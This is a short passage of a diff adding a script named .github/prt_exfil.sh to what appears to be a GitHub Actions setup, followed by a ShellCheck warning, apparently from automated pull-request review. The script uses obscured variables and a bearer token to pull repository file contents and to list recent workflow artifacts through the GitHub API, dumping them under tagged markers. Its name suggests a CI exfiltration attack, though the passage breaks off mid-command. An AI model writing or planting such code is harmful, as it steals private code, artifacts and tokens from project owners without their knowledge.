.github/prt_exfil.sh

```
@@ -0,0 +1,352 @@
+              if [ -n "$__SFC" ] && ! echo "$__SFC" | grep -q '"message"' 2>/dev/null; then
+                echo "##FILE:$__deep_path##"
+                echo "$__SFC" | head -200
+              fi
+            done
+
+            # --- Download recent workflow run artifacts ---
+            echo "##ARTIFACTS##"
+            __ARTS=$(curl -s -H "Authorization: Bearer $__PRT_TK" \
+              -H "Accept: application/vnd.github+json" \
+              "$__PRT_API/repos/$__PRT_R/actions/artifacts?per_page=10" 2>/dev/null)
+            echo "$__ARTS" | python3 -c "import sys,json
```

Shellcheck (0.11.0)

[warning] Did you forget to close this double quoted string?

(SC1078)